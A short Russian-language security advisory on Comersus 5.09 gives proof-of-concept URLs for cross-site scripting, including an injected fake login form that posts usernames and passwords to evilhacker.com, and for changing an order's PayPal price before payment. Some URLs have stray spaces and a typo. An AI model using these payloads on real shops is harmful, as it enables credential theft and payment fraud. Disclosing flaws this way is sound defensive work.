Программа: Comersus 5.09 

Несколько уязвимостей обнаружено в Comersus. Удаленный пользователь может выполнить XSS нападение и изменять цену покупки. 

1. XSS: 

ttp://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv=’refresh’content=’0’> 

http://[VICTIM]/comersus/store/comersus_message.asp? message=<form%20action=»http://www.evilhacker.com/
save2db.asp"%20method="post">Username:<input%20nam  e="username"%20type="text"%20maxlength="30">
<br>Password:<input%20 name="pass word"%20type="text"%20maxlength="30">
<br><input%20name="login"%20type="submit"%20value="Login"></form>

http://[VICTIM]/comersus/backofficeLite/comersus_backoffice _message.asp?message=<script>alert
("VULNERABLE_TO_XSS")</script>

2. Удаленный пользователь может изменять цену покупки, перед оплатой товара через PayPal. 

http://[VICTIM]/comersus/store/comersus_gateway PayPal.asp?idOrder=2002&OrderTotal=|102|222|
228|22|130|36|209&name=Thomas&lastName =Ryan&address=123+Easy+Modify+Street&
city=New+York&state=NY&zip=10001& country=US&phone=212%2D857%2D1731&
email=tommy%40providesecurity%2Ecom& orderDetails=1x+%23RDHT%2F11+Red+Hat
+Deluxe+WorkStation+Options%3A+%3D+ %2479%2E00%0D%0A2x+%23WME%2F1+
Windows+Millennium+Edition+Options%3A+ %3D+%24398%2E00%0D%0A1x+%23BPRE
S2%2F6+So+You+Want+to+Be+President%3F +Options%3A+%3D+%2414%2E39%0D%0A

Оставить мнение